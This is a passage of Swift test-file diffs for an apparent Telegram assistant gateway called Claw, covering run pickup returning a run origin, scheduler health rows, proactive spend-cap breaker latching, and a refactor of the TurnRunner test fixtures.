+    // then
+    let count = try queue.read { db in
+      try Int.fetchOne(db, sql: "SELECT COUNT(*) FROM audit_events WHERE action = 'job_failed'")
+        ?? 0
+    }
+    #expect(count == 0)
+  }
+}

--- a/Tests/ClawDataTests/Stores/Run/RunStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/RunStoreTests.swift
@@ -95,7 +95,7 @@ import Testing
         now: Date()
       ) == nil
     )
-    #expect(try env.runs.pickUp(runId: env.seedRunId, now: Date()) != nil)
+    _ = try #require(try env.runs.pickUp(runId: env.seedRunId, now: Date()))
 
     // when
     let cancelled = try env.runs.cancelActiveRun(
@@ -121,7 +121,7 @@ import Testing
   @Test func supersedeSessionRunsTerminatesRunningAndQueuedRuns() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.seedRunId, now: Date()) != nil)
+    _ = try #require(try env.runs.pickUp(runId: env.seedRunId, now: Date()))
     let queued = try env.sessions.claimAndPersistInbound(
       InboundMessage(
         updateId: 2,
@@ -199,7 +199,7 @@ import Testing
     // given
     let env = try fixture()
     let runId = env.seedRunId
-    #expect(try env.runs.pickUp(runId: runId, now: Date()) != nil)
+    _ = try #require(try env.runs.pickUp(runId: runId, now: Date()))
     let turn = AssistantTurn(
       runId: runId,
       sessionId: env.sessionId,
@@ -251,7 +251,7 @@ import Testing
       )
     )
     let runningRunId = try #require(runningClaim.runId)
-    #expect(try env.runs.pickUp(runId: runningRunId, now: Date()) != nil)
+    _ = try #require(try env.runs.pickUp(runId: runningRunId, now: Date()))
 
     // when
     let replies = try env.runs.reconcileRunsAtBoot(now: Date(), degradationText: "didn't finish")
@@ -269,7 +269,7 @@ import Testing
     // given
     let env = try fixture()
     let runId = env.seedRunId
-    #expect(try env.runs.pickUp(runId: runId, now: Date()) != nil)
+    _ = try #require(try env.runs.pickUp(runId: runId, now: Date()))
     _ = try env.outbox.claimOutbound(
       runId: runId,
       stepIndex: 0,
@@ -296,7 +296,7 @@ import Testing
     // given
     let env = try fixture()
     let runId = env.seedRunId
-    #expect(try env.runs.pickUp(runId: runId, now: Date()) != nil)
+    _ = try #require(try env.runs.pickUp(runId: runId, now: Date()))
     try env.queue.write { db in
       try db.execute(
         sql:

--- a/Tests/ClawDataTests/Stores/Run/RunStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/RunStoreTests.swift
@@ -58,7 +58,7 @@ import Testing
     )
   }
 
-  @Test func pickUpMovesPendingRunToRunningOnce() throws {
+  @Test func pickUpMovesPendingRunToRunningOnceAndReturnsTheOrigin() throws {
     // given
     let env = try fixture()
 
@@ -66,19 +66,23 @@ import Testing
     let first = try env.runs.pickUp(runId: env.seedRunId, now: Date())
     let second = try env.runs.pickUp(runId: env.seedRunId, now: Date())
 
-    // then
-    #expect(first)
-    #expect(second == false)
-    let state = try #require(
-      try env.queue.read { db in
-        try String.fetchOne(
-          db,
-          sql: "SELECT state FROM runs WHERE id = ?",
-          arguments: [env.seedRunId]
-        )
-      }
-    )
-    #expect(state == RunState.running.rawValue)
+    // then — the origin rides the pickup read; the not-PENDING guard is nil (preamble dev. 3)
+    #expect(first == .interactive)  // v6 default backfill
+    #expect(second == nil)
+  }
+
+  @Test func pickUpReturnsTheScheduledOrigin() throws {
+    // given
+    let env = try fixture()
+    try env.queue.write { db in
+      try db.execute(
+        sql: "UPDATE runs SET origin = 'scheduled' WHERE id = ?",
+        arguments: [env.seedRunId]
+      )
+    }
+
+    // when / then
+    #expect(try env.runs.pickUp(runId: env.seedRunId, now: Date()) == .scheduled)
   }
 
   @Test func cancelActiveRunOnlyCancelsRunningRun() throws {
@@ -91,7 +95,7 @@ import Testing
         now: Date()
       ) == nil
     )
-    #expect(try env.runs.pickUp(runId: env.seedRunId, now: Date()))
+    #expect(try env.runs.pickUp(runId: env.seedRunId, now: Date()) != nil)
 
     // when
     let cancelled = try env.runs.cancelActiveRun(
@@ -117,7 +121,7 @@ import Testing
   @Test func supersedeSessionRunsTerminatesRunningAndQueuedRuns() throws {
     // given
     let env = try fixture()
-    #expect(try env.runs.pickUp(runId: env.seedRunId, now: Date()))
+    #expect(try env.runs.pickUp(runId: env.seedRunId, now: Date()) != nil)
     let queued = try env.sessions.claimAndPersistInbound(
       InboundMessage(
         updateId: 2,
@@ -144,7 +148,7 @@ import Testing
       )
     }
     #expect(states == [RunState.superseded.rawValue, RunState.superseded.rawValue])
-    #expect(try env.runs.pickUp(runId: queuedRunId, now: Date()) == false)
+    #expect(try env.runs.pickUp(runId: queuedRunId, now: Date()) == nil)
   }
 
   @Test func assistantCommitAfterSupersedeRecordsUsageOnly() throws {
@@ -195,7 +199,7 @@ import Testing
     // given
     let env = try fixture()
     let runId = env.seedRunId
-    #expect(try env.runs.pickUp(runId: runId, now: Date()))
+    #expect(try env.runs.pickUp(runId: runId, now: Date()) != nil)
     let turn = AssistantTurn(
       runId: runId,
       sessionId: env.sessionId,
@@ -247,7 +251,7 @@ import Testing
       )
     )
     let runningRunId = try #require(runningClaim.runId)
-    #expect(try env.runs.pickUp(runId: runningRunId, now: Date()))
+    #expect(try env.runs.pickUp(runId: runningRunId, now: Date()) != nil)
 
     // when
     let replies = try env.runs.reconcileRunsAtBoot(now: Date(), degradationText: "didn't finish")
@@ -265,7 +269,7 @@ import Testing
     // given
     let env = try fixture()
     let runId = env.seedRunId
-    #expect(try env.runs.pickUp(runId: runId, now: Date()))
+    #expect(try env.runs.pickUp(runId: runId, now: Date()) != nil)
     _ = try env.outbox.claimOutbound(
       runId: runId,
       stepIndex: 0,
@@ -292,7 +296,7 @@ import Testing
     // given
     let env = try fixture()
     let runId = env.seedRunId
-    #expect(try env.runs.pickUp(runId: runId, now: Date()))
+    #expect(try env.runs.pickUp(runId: runId, now: Date()) != nil)
     try env.queue.write { db in
       try db.execute(
         sql:

--- a/Tests/ClawDataTests/Stores/Run/RunsHealthTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/RunsHealthTests.swift
@@ -82,7 +82,7 @@ import Testing
       chatId: chatId,
       ts: now
     )
-    #expect(try fixture.store.pickUp(runId: runId, now: now) != nil)
+    _ = try #require(try fixture.store.pickUp(runId: runId, now: now))
     let usage = ProviderUsage(
       runId: runId,
       sessionId: fixture.sessionId,
@@ -125,7 +125,7 @@ import Testing
       updateId: 2,
       ts: base.addingTimeInterval(2)
     )
-    #expect(try store.pickUp(runId: failed1, now: base.addingTimeInterval(2)) != nil)
+    _ = try #require(try store.pickUp(runId: failed1, now: base.addingTimeInterval(2)))
     try store.failRun(runId: failed1, now: base.addingTimeInterval(3))
 
     let failed2 = try seedPendingRun(
@@ -133,7 +133,7 @@ import Testing
       updateId: 3,
       ts: base.addingTimeInterval(4)
     )
-    #expect(try store.pickUp(runId: failed2, now: base.addingTimeInterval(4)) != nil)
+    _ = try #require(try store.pickUp(runId: failed2, now: base.addingTimeInterval(4)))
     try store.failRun(runId: failed2, now: base.addingTimeInterval(5))
 
     _ = try seedPendingRun(
@@ -180,7 +180,7 @@ import Testing
         updateId: Int64(index + 2),
         ts: base.addingTimeInterval(offset)
       )
-      #expect(try store.pickUp(runId: runId, now: base.addingTimeInterval(offset)) != nil)
+      _ = try #require(try store.pickUp(runId: runId, now: base.addingTimeInterval(offset)))
       try store.failRun(runId: runId, now: base.addingTimeInterval(offset + 1))
     }
 
@@ -200,7 +200,7 @@ import Testing
     let base = Date(timeIntervalSinceReferenceDate: 0)
 
     let run1 = try seedPendingRun(sessions: fix.sessions, updateId: 1, ts: base)
-    #expect(try store.pickUp(runId: run1, now: base) != nil)
+    _ = try #require(try store.pickUp(runId: run1, now: base))
     try store.failRun(runId: run1, now: base.addingTimeInterval(1))
 
     let run2 = try seedPendingRun(
@@ -208,7 +208,7 @@ import Testing
       updateId: 2,
       ts: base.addingTimeInterval(2)
     )
-    #expect(try store.pickUp(runId: run2, now: base.addingTimeInterval(2)) != nil)
+    _ = try #require(try store.pickUp(runId: run2, now: base.addingTimeInterval(2)))
     try store.failRun(runId: run2, now: base.addingTimeInterval(3))
 
     try commitDone(
@@ -223,7 +223,7 @@ import Testing
       updateId: 4,
       ts: base.addingTimeInterval(6)
     )
-    #expect(try store.pickUp(runId: run4, now: base.addingTimeInterval(6)) != nil)
+    _ = try #require(try store.pickUp(runId: run4, now: base.addingTimeInterval(6)))
     try store.failRun(runId: run4, now: base.addingTimeInterval(7))
 
     // when

--- a/Tests/ClawDataTests/Stores/Run/RunsHealthTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/RunsHealthTests.swift
@@ -82,7 +82,7 @@ import Testing
       chatId: chatId,
       ts: now
     )
-    #expect(try fixture.store.pickUp(runId: runId, now: now))
+    #expect(try fixture.store.pickUp(runId: runId, now: now) != nil)
     let usage = ProviderUsage(
       runId: runId,
       sessionId: fixture.sessionId,
@@ -125,7 +125,7 @@ import Testing
       updateId: 2,
       ts: base.addingTimeInterval(2)
     )
-    #expect(try store.pickUp(runId: failed1, now: base.addingTimeInterval(2)))
+    #expect(try store.pickUp(runId: failed1, now: base.addingTimeInterval(2)) != nil)
     try store.failRun(runId: failed1, now: base.addingTimeInterval(3))
 
     let failed2 = try seedPendingRun(
@@ -133,7 +133,7 @@ import Testing
       updateId: 3,
       ts: base.addingTimeInterval(4)
     )
-    #expect(try store.pickUp(runId: failed2, now: base.addingTimeInterval(4)))
+    #expect(try store.pickUp(runId: failed2, now: base.addingTimeInterval(4)) != nil)
     try store.failRun(runId: failed2, now: base.addingTimeInterval(5))
 
     _ = try seedPendingRun(
@@ -180,7 +180,7 @@ import Testing
         updateId: Int64(index + 2),
         ts: base.addingTimeInterval(offset)
       )
-      #expect(try store.pickUp(runId: runId, now: base.addingTimeInterval(offset)))
+      #expect(try store.pickUp(runId: runId, now: base.addingTimeInterval(offset)) != nil)
       try store.failRun(runId: runId, now: base.addingTimeInterval(offset + 1))
     }
 
@@ -200,7 +200,7 @@ import Testing
     let base = Date(timeIntervalSinceReferenceDate: 0)
 
     let run1 = try seedPendingRun(sessions: fix.sessions, updateId: 1, ts: base)
-    #expect(try store.pickUp(runId: run1, now: base))
+    #expect(try store.pickUp(runId: run1, now: base) != nil)
     try store.failRun(runId: run1, now: base.addingTimeInterval(1))
 
     let run2 = try seedPendingRun(
@@ -208,7 +208,7 @@ import Testing
       updateId: 2,
       ts: base.addingTimeInterval(2)
     )
-    #expect(try store.pickUp(runId: run2, now: base.addingTimeInterval(2)))
+    #expect(try store.pickUp(runId: run2, now: base.addingTimeInterval(2)) != nil)
     try store.failRun(runId: run2, now: base.addingTimeInterval(3))
 
     try commitDone(
@@ -223,7 +223,7 @@ import Testing
       updateId: 4,
       ts: base.addingTimeInterval(6)
     )
-    #expect(try store.pickUp(runId: run4, now: base.addingTimeInterval(6)))
+    #expect(try store.pickUp(runId: run4, now: base.addingTimeInterval(6)) != nil)
     try store.failRun(runId: run4, now: base.addingTimeInterval(7))
 
     // when

--- a/Tests/ClawGatewayTests/Response/SchedulerHealthTests.swift
+++ b/Tests/ClawGatewayTests/Response/SchedulerHealthTests.swift
@@ -1,0 +1,142 @@
+import ClawCore
+import Foundation
+import Testing
+
+@testable import ClawGateway
+
+@Suite struct SchedulerHealthTests {
+  /// 2026-07-06 05:00:00 UTC — 07:00 in Europe/Berlin (CEST), so the local day is 2026-07-06.
+  private let now = Date(timeIntervalSince1970: 1_783_314_000)
+  // force_unwrapping is `error` project-wide with no Tests exclusion (.swiftlint.yml); `Europe/
+  // Berlin` always resolves at runtime, so `.gmt` here is unreachable — matches sibling tests.
+  private let berlin = TimeZone(identifier: "Europe/Berlin") ?? .gmt
+
+  private func value(_ rows: [SchedulerHealth.Row], _ key: String) -> String? {
+    rows.first { row in row.key == key }?.value
+  }
+
+  @Test func emptyStateRendersNeverAndZeroCounts() {
+    // given — a freshly-migrated scheduler_state: nothing has ever ticked
+    let state = SchedulerState(
+      lastTickAt: nil,
+      lastMisfireAt: nil,
+      lastMisfireSkippedCount: 0,
+      lastHeartbeatAt: nil,
+      heartbeatCountDay: nil,
+      heartbeatCount: 0
+    )
+
+    // when
+    let rows = SchedulerHealth.rows(
+      state: state,
+      dueCount: 0,
+      proactiveTodayUSD: 0,
+      proactivePerDayUSD: 2.0,
+      heartbeatEnabled: false,
+      heartbeatMaxPerDay: 8,
+      timezone: berlin,
+      now: now
+    )
+
+    // then
+    #expect(value(rows, "scheduler.last_tick_at") == "never")
+    #expect(value(rows, "scheduler.due_count") == "0")
+    #expect(value(rows, "scheduler.last_misfire") == "none")
+    #expect(value(rows, "spend.proactive_today_usd") == "0.00/2.00")
+    #expect(value(rows, "heartbeat.enabled") == "off")
+    #expect(value(rows, "heartbeat.last") == "never")
+    #expect(value(rows, "heartbeat.today") == "0/8")
+  }
+
+  @Test func populatedStateRendersTimestampsMisfireCountAndTodayCount() {
+    // given — a tick a minute ago, one misfire that skipped 5, 3 heartbeats stamped for TODAY
+    // in the configured zone
+    let state = SchedulerState(
+      lastTickAt: now.addingTimeInterval(-60),
+      lastMisfireAt: now.addingTimeInterval(-3_600),
+      lastMisfireSkippedCount: 5,
+      lastHeartbeatAt: now.addingTimeInterval(-120),
+      heartbeatCountDay: "2026-07-06",
+      heartbeatCount: 3
+    )
+
+    // when
+    let rows = SchedulerHealth.rows(
+      state: state,
+      dueCount: 2,
+      proactiveTodayUSD: 0.42,
+      proactivePerDayUSD: 2.0,
+      heartbeatEnabled: true,
+      heartbeatMaxPerDay: 8,
+      timezone: berlin,
+      now: now
+    )
+
+    // then
+    #expect(
+      value(rows, "scheduler.last_tick_at") == String(describing: now.addingTimeInterval(-60))
+    )
+    #expect(value(rows, "scheduler.due_count") == "2")
+    #expect(value(rows, "scheduler.last_misfire")?.contains("skipped 5") == true)
+    #expect(value(rows, "spend.proactive_today_usd") == "0.42/2.00")
+    #expect(value(rows, "heartbeat.enabled") == "on")
+    #expect(value(rows, "heartbeat.today") == "3/8")
+  }
+
+  @Test func staleHeartbeatDayStampReadsAsZero() {
+    // given — the counter belongs to a PREVIOUS local day: the cap has rolled over (§4.3)
+    let state = SchedulerState(
+      lastTickAt: nil,
+      lastMisfireAt: nil,
+      lastMisfireSkippedCount: 0,
+      lastHeartbeatAt: nil,
+      heartbeatCountDay: "2026-07-05",
+      heartbeatCount: 7
+    )
+
+    // when
+    let rows = SchedulerHealth.rows(
+      state: state,
+      dueCount: nil,
+      proactiveTodayUSD: nil,
+      proactivePerDayUSD: 2.0,
+      heartbeatEnabled: true,
+      heartbeatMaxPerDay: 8,
+      timezone: berlin,
+      now: now
+    )
+
+    // then — a stale stamp reads as zero; an unreadable count/spend says so instead of lying
+    #expect(value(rows, "heartbeat.today") == "0/8")
+    #expect(value(rows, "scheduler.due_count") == "unknown")
+    #expect(value(rows, "spend.proactive_today_usd") == "unknown/2.00")
+  }
+
+  @Test func dayBoundaryUsesTheConfiguredZoneNotUTC() {
+    // given — 2026-07-06 23:30 UTC is already 2026-07-07 01:30 in Berlin (CEST, UTC+2)
+    let lateEvening = Date(timeIntervalSince1970: 1_783_380_600)
+    let state = SchedulerState(
+      lastTickAt: nil,
+      lastMisfireAt: nil,
+      lastMisfireSkippedCount: 0,
+      lastHeartbeatAt: nil,
+      heartbeatCountDay: "2026-07-07",
+      heartbeatCount: 2
+    )
+
+    // when
+    let rows = SchedulerHealth.rows(
+      state: state,
+      dueCount: 0,
+      proactiveTodayUSD: 0,
+      proactivePerDayUSD: 2.0,
+      heartbeatEnabled: true,
+      heartbeatMaxPerDay: 8,
+      timezone: berlin,
+      now: lateEvening
+    )
+
+    // then — the cap's day boundary aligns with quiet hours (CLAW_TIMEZONE), not UTC (§4.3)
+    #expect(value(rows, "heartbeat.today") == "2/8")
+  }
+}

--- a/Tests/ClawGatewayTests/Routing/BudgetBreakerTests.swift
+++ b/Tests/ClawGatewayTests/Routing/BudgetBreakerTests.swift
@@ -62,4 +62,35 @@ import Testing
     // then
     #expect(shouldNotify)
   }
+
+  @Test("the proactive trip DM latches once per UTC day and resets on rollover")
+  func proactiveTripNotifiesOncePerUTCDay() async {
+    // given
+    let breaker = BudgetBreaker(budget: .default)
+    let nextDay = now.addingTimeInterval(24 * 60 * 60)
+
+    // when
+    let first = await breaker.shouldNotifyProactiveTrip(now: now)
+    let second = await breaker.shouldNotifyProactiveTrip(now: now)
+    let tomorrow = await breaker.shouldNotifyProactiveTrip(now: nextDay)
+
+    // then
+    #expect(first)
+    #expect(!second)
+    #expect(tomorrow)
+  }
+
+  @Test("the proactive latch is independent of the global daily latch")
+  func proactiveLatchIsIndependentOfTheGlobalOne() async {
+    // given
+    let breaker = BudgetBreaker(budget: .default)
+
+    // when — the global cap trips and DMs first; the proactive trip must still DM the same day
+    let globalNotify = await breaker.shouldNotifyTrip(todayTokens: 0, todayUSD: 10.0, now: now)
+    let proactiveNotify = await breaker.shouldNotifyProactiveTrip(now: now)
+
+    // then
+    #expect(globalNotify)
+    #expect(proactiveNotify)
+  }
 }

--- a/Tests/ClawGatewayTests/Routing/MessageRouterTests.swift
+++ b/Tests/ClawGatewayTests/Routing/MessageRouterTests.swift
@@ -180,7 +180,9 @@ struct FullSessions: SessionMessageStore {
     // given
     let harness = try makeHarness(allowed: [42])
     let seeded = try seedPendingRun(harness, updateId: 10, text: "working")
-    #expect(try harness.runs.pickUp(runId: seeded.runId, now: Date(timeIntervalSince1970: 10)))
+    #expect(
+      try harness.runs.pickUp(runId: seeded.runId, now: Date(timeIntervalSince1970: 10)) != nil
+    )
 
     // when
     let outcome = await harness.router.handle(
@@ -271,7 +273,7 @@ struct FullSessions: SessionMessageStore {
       )
     )
     let runId = try #require(claim.runId)
-    #expect(try runs.pickUp(runId: runId, now: Date(timeIntervalSince1970: 51)))
+    #expect(try runs.pickUp(runId: runId, now: Date(timeIntervalSince1970: 51)) != nil)
     let transport = RecordingTransport(sendError: .transport("ack down"))
     let dispatcher = FakeTurnRunner()
     let router = MessageRouter(
@@ -319,7 +321,7 @@ struct FullSessions: SessionMessageStore {
       )
     )
     let runningRunId = try #require(firstClaim.runId)
-    #expect(try runs.pickUp(runId: runningRunId, now: Date(timeIntervalSince1970: 61)))
+    #expect(try runs.pickUp(runId: runningRunId, now: Date(timeIntervalSince1970: 61)) != nil)
     let secondClaim = try sessionMessages.claimAndPersistInbound(
       InboundMessage(
         updateId: 61,

--- a/Tests/ClawGatewayTests/Routing/MessageRouterTests.swift
+++ b/Tests/ClawGatewayTests/Routing/MessageRouterTests.swift
@@ -180,8 +180,8 @@ struct FullSessions: SessionMessageStore {
     // given
     let harness = try makeHarness(allowed: [42])
     let seeded = try seedPendingRun(harness, updateId: 10, text: "working")
-    #expect(
-      try harness.runs.pickUp(runId: seeded.runId, now: Date(timeIntervalSince1970: 10)) != nil
+    _ = try #require(
+      try harness.runs.pickUp(runId: seeded.runId, now: Date(timeIntervalSince1970: 10))
     )
 
     // when
@@ -273,7 +273,7 @@ struct FullSessions: SessionMessageStore {
       )
     )
     let runId = try #require(claim.runId)
-    #expect(try runs.pickUp(runId: runId, now: Date(timeIntervalSince1970: 51)) != nil)
+    _ = try #require(try runs.pickUp(runId: runId, now: Date(timeIntervalSince1970: 51)))
     let transport = RecordingTransport(sendError: .transport("ack down"))
     let dispatcher = FakeTurnRunner()
     let router = MessageRouter(
@@ -321,7 +321,7 @@ struct FullSessions: SessionMessageStore {
       )
     )
     let runningRunId = try #require(firstClaim.runId)
-    #expect(try runs.pickUp(runId: runningRunId, now: Date(timeIntervalSince1970: 61)) != nil)
+    _ = try #require(try runs.pickUp(runId: runningRunId, now: Date(timeIntervalSince1970: 61)))
     let secondClaim = try sessionMessages.claimAndPersistInbound(
       InboundMessage(
         updateId: 61,

--- a/Tests/ClawGatewayTests/Routing/TurnRunnerOutcomeTests.swift
+++ b/Tests/ClawGatewayTests/Routing/TurnRunnerOutcomeTests.swift
@@ -190,6 +190,7 @@ import Testing
       retryBudget: 3,
       perRunUSD: 0.50,
       perDayUSD: 10,
+      proactivePerDayUSD: 2.00,
       referenceUSDPerToken: 0.000_015,
       maxTurns: 12,
       maxToolCalls: 1

--- a/Tests/ClawGatewayTests/Routing/TurnRunnerTests.swift
+++ b/Tests/ClawGatewayTests/Routing/TurnRunnerTests.swift
@@ -42,7 +42,7 @@ struct CancellingBeforeAssistantCommitRuns: RunStore {
   let base: RunStoreGRDB
   let sessionId: Int64
 
-  func pickUp(runId: Int64, now: Date) throws -> Bool {
+  func pickUp(runId: Int64, now: Date) throws -> RunOrigin? {
     try base.pickUp(runId: runId, now: now)
   }
 
@@ -82,7 +82,7 @@ struct CancellingBeforeDegradedCommitRuns: RunStore {
   let base: RunStoreGRDB
   let sessionId: Int64
 
-  func pickUp(runId: Int64, now: Date) throws -> Bool {
+  func pickUp(runId: Int64, now: Date) throws -> RunOrigin? {
     try base.pickUp(runId: runId, now: now)
   }
 
@@ -118,7 +118,7 @@ struct CancellingBeforeDegradedCommitRuns: RunStore {
 
 /// A `RunStore` whose first write reports a full disk, to exercise the storage-full rethrow.
 struct DiskFullRuns: RunStore {
-  func pickUp(runId: Int64, now: Date) throws -> Bool { throw StoreError.diskFull }
+  func pickUp(runId: Int64, now: Date) throws -> RunOrigin? { throw StoreError.diskFull }
   func commitAssistantTurn(_ turn: AssistantTurn, now: Date) throws -> RunCommitResult { .ignored }
   func commitDegradedTurn(_ turn: DegradedTurn, now: Date) throws -> RunCommitResult { .ignored }
   func failRun(runId: Int64, now: Date) throws {}
@@ -196,133 +196,245 @@ struct SnapshotFailingSessionMessages: SessionMessageStore {
   func resetWindowAndDetaint(sessionId: Int64, now: Date) throws {}
 }
 
-@Suite struct TurnRunnerTests {
-  private struct Env {
-    let runner: TurnRunner
-    let queue: DatabaseQueue
-    let sessionMessages: SessionMessageStoreGRDB
-    let outbox: OutboxStoreGRDB
-    let sessionId: Int64
-    let chatId: Int64
-    let runId: Int64
-    let triggerMessageId: Int64
-    let provider: StubLLMProvider
-  }
+/// Shared `TurnRunner` test fixture, hoisted to file scope (out of `TurnRunnerTests`' body) so the
+/// suite's own body stays under the project's type-length gate as its test count grows.
+private struct Env {
+  let runner: TurnRunner
+  let queue: DatabaseQueue
+  let sessionMessages: SessionMessageStoreGRDB
+  let outbox: OutboxStoreGRDB
+  let sessionId: Int64
+  let chatId: Int64
+  let runId: Int64
+  let triggerMessageId: Int64
+  let provider: StubLLMProvider
+}
 
-  private func makeContextBuilder(
-    workspace: TurnRunnerWorkspace = TurnRunnerWorkspace(),
-    budget: ContextBudget = .default
-  ) throws -> ContextBuilder {
-    let queue = try ClawDatabase.makeInMemoryQueue()
-    try ClawDatabase.migrate(queue)
-    let memory = MemoryStoreGRDB(writer: queue)
-    let retriever = RetrieverGRDB(writer: queue)
-    return ContextBuilder(
-      systemPrompt: SystemPrompt.minimal,
-      workspace: workspace,
-      memoryStore: memory,
-      retriever: retriever,
-      budget: budget,
-      now: { Date(timeIntervalSince1970: 0) }
+private func makeContextBuilder(
+  workspace: TurnRunnerWorkspace = TurnRunnerWorkspace(),
+  budget: ContextBudget = .default
+) throws -> ContextBuilder {
+  let queue = try ClawDatabase.makeInMemoryQueue()
+  try ClawDatabase.migrate(queue)
+  let memory = MemoryStoreGRDB(writer: queue)
+  let retriever = RetrieverGRDB(writer: queue)
+  return ContextBuilder(
+    systemPrompt: SystemPrompt.minimal,
+    workspace: workspace,
+    memoryStore: memory,
+    retriever: retriever,
+    budget: budget,
+    now: { Date(timeIntervalSince1970: 0) }
+  )
+}
+
+private func makeEnv(
+  agentOutcome: StubLLMProvider.Outcome,
+  runs: (any RunStore)? = nil,
+  runsFactory: ((DatabaseQueue, Int64) -> any RunStore)? = nil,
+  contextBuilder: ContextBuilder? = nil,
+  sessionMessagesForRunner: (any SessionMessageStore)? = nil,
+  budget: RunBudget = .default,
+  breaker: BudgetBreaker? = nil,
+  transport: (any TelegramTransport)? = nil
+) throws -> Env {
+  let queue = try ClawDatabase.makeInMemoryQueue()
+  try ClawDatabase.migrate(queue)
+
+  let sessionMessages = SessionMessageStoreGRDB(writer: queue)
+  let usage = UsageStoreGRDB(writer: queue)
+  let outbox = OutboxStoreGRDB(writer: queue)
+  let audit = AuditLogGRDB(writer: queue)
+
+  // Seed a session + a user message via the real fused claim, so history is realistic.
+  let chatId: Int64 = 42
+  let claim = try sessionMessages.claimAndPersistInbound(
+    InboundMessage(
+      updateId: 1,
+      sessionKey: SessionKey.telegramDM(chatId: chatId),
+      chatId: chatId,
+      userId: chatId,
+      text: "hi",
+      isEdited: false,
+      ts: Date()
     )
+  )
+  let sessionId = try #require(claim.sessionId)
+  let runId = try #require(claim.runId)
+  let triggerMessageId = try #require(claim.triggerMessageId)
+
+  let builder: ContextBuilder
+  if let contextBuilder {
+    builder = contextBuilder
+  } else {
+    builder = try makeContextBuilder()
   }
 
-  private func makeEnv(
-    agentOutcome: StubLLMProvider.Outcome,
-    runs: (any RunStore)? = nil,
-    runsFactory: ((DatabaseQueue, Int64) -> any RunStore)? = nil,
-    contextBuilder: ContextBuilder? = nil,
-    sessionMessagesForRunner: (any SessionMessageStore)? = nil,
-    budget: RunBudget = .default
-  ) throws -> Env {
-    let queue = try ClawDatabase.makeInMemoryQueue()
-    try ClawDatabase.migrate(queue)
+  let provider = StubLLMProvider(agentOutcome)
+  let agent = AgentRuntime(
+    provider: provider,
+    typingIndicator: NoopTyping(),
+    draftStreamer: NoopRichDraftStreaming(),
+    streamingEnabled: false,
+    costResolver: CostResolver(
+      priceTable: .empty,
+      referenceUSDPerToken: RunBudget.default.referenceUSDPerToken
+    ),
+    budget: budget,
+    model: "gpt-4o",
+    usageStore: usage,
+    auditLog: audit,
+    sleep: { try await Task.sleep(for: $0) }
+  )
 
-    let sessionMessages = SessionMessageStoreGRDB(writer: queue)
-    let usage = UsageStoreGRDB(writer: queue)
-    let outbox = OutboxStoreGRDB(writer: queue)
-    let audit = AuditLogGRDB(writer: queue)
+  let runner = TurnRunner(
+    sessionMessages: sessionMessagesForRunner ?? sessionMessages,
+    runs: runsFactory?(queue, sessionId) ?? runs ?? RunStoreGRDB(writer: queue),
+    usageStore: usage,
+    audit: audit,
+    agent: agent,
+    budget: budget,
+    contextBuilder: builder,
+    pendingConfirmations: PendingConfirmationRegistry(),
+    notifyOutbox: {},
+    breaker: breaker,
+    transport: transport,
+    logger: Logger(label: "test")
+  )
 
-    // Seed a session + a user message via the real fused claim, so history is realistic.
-    let chatId: Int64 = 42
-    let claim = try sessionMessages.claimAndPersistInbound(
+  return Env(
+    runner: runner,
+    queue: queue,
+    sessionMessages: sessionMessages,
+    outbox: outbox,
+    sessionId: sessionId,
+    chatId: chatId,
+    runId: runId,
+    triggerMessageId: triggerMessageId,
+    provider: provider
+  )
+}
+
+private func latestRunState(_ queue: DatabaseQueue) throws -> String? {
+  try queue.read { db in
+    try String.fetchOne(db, sql: "SELECT state FROM runs ORDER BY id DESC LIMIT 1")
+  }
+}
+
+private func okResponse(content: String) -> ChatResponse {
+  ChatResponse(
+    content: content,
+    finishReason: "stop",
+    usage: ChatUsage(promptTokens: 10, completionTokens: 5, totalTokens: 15),
+    costFromProvider: 0.0021
+  )
+}
+
+@Suite struct TurnRunnerTests {
+  @Test func scheduledRunAtTheProactiveCapIsDeniedDMedOnceAndAudited() async throws {
+    // given — a scheduled-origin run whose proactive pool already spent 2.50 today
+    let transport = RecordingTransport()
+    let env = try makeEnv(
+      agentOutcome: .respond(okResponse(content: "should never run")),
+      breaker: BudgetBreaker(budget: .default),
+      transport: transport
+    )
+    try await env.queue.write { db in
+      try db.execute(
+        sql: "UPDATE runs SET origin = 'scheduled' WHERE id = ?",
+        arguments: [env.runId]
+      )
+    }
+    try UsageStoreGRDB(writer: env.queue).recordUsage(
+      ProviderUsage(
+        runId: env.runId,
+        sessionId: env.sessionId,
+        model: "m",
+        promptTokens: 10,
+        completionTokens: 5,
+        costUSD: 2.50,
+        costSource: .heuristic,
+        isEstimated: true,
+        ts: Date()
+      )
+    )
+
+    // when
+    try await env.runner.run(
+      runId: env.runId,
+      sessionId: env.sessionId,
+      chatId: env.chatId,
+      triggerMessageId: env.triggerMessageId,
+      grant: nil
+    )
+
+    // then — FAILED with the named cap, the model never ran, one owner DM, one audit trip row
+    #expect(try latestRunState(env.queue) == "FAILED")
+    let pending = try env.outbox.pendingOutbound()
+    #expect(pending.first?.payload == Degradation.budget(cap: "proactive per-day spend"))
+    #expect(await env.provider.callCount == 0)
+    #expect(await transport.sent.map(\.text) == [Degradation.proactiveCapTripped])
+    let tripCount = try await env.queue.read { db in
+      try Int.fetchOne(
+        db,
+        sql: """
+          SELECT COUNT(*) FROM audit_events
+          WHERE action = 'budget_tripped' AND decision = 'proactive_per_day'
+          """
+      )
+    }
+    #expect(tripCount == 1)
+  }
+
+  @Test func interactiveRunIsUnaffectedByProactiveSpendAtTheSameMoment() async throws {
+    // given — the same 2.50 proactive spend, recorded on a DIFFERENT scheduled run
+    let env = try makeEnv(agentOutcome: .respond(okResponse(content: "Hello there")))
+    let otherClaim = try env.sessionMessages.claimAndPersistInbound(
       InboundMessage(
-        updateId: 1,
-        sessionKey: SessionKey.telegramDM(chatId: chatId),
-        chatId: chatId,
-        userId: chatId,
-        text: "hi",
+        updateId: 2,
+        sessionKey: SessionKey.telegramDM(chatId: 77),
+        chatId: 77,
+        userId: 77,
+        text: "seed",
         isEdited: false,
         ts: Date()
       )
     )
-    let sessionId = try #require(claim.sessionId)
-    let runId = try #require(claim.runId)
-    let triggerMessageId = try #require(claim.triggerMessageId)
-
-    let builder: ContextBuilder
-    if let contextBuilder {
-      builder = contextBuilder
-    } else {
-      builder = try makeContextBuilder()
+    let otherRunId = try #require(otherClaim.runId)
+    try await env.queue.write { db in
+      try db.execute(
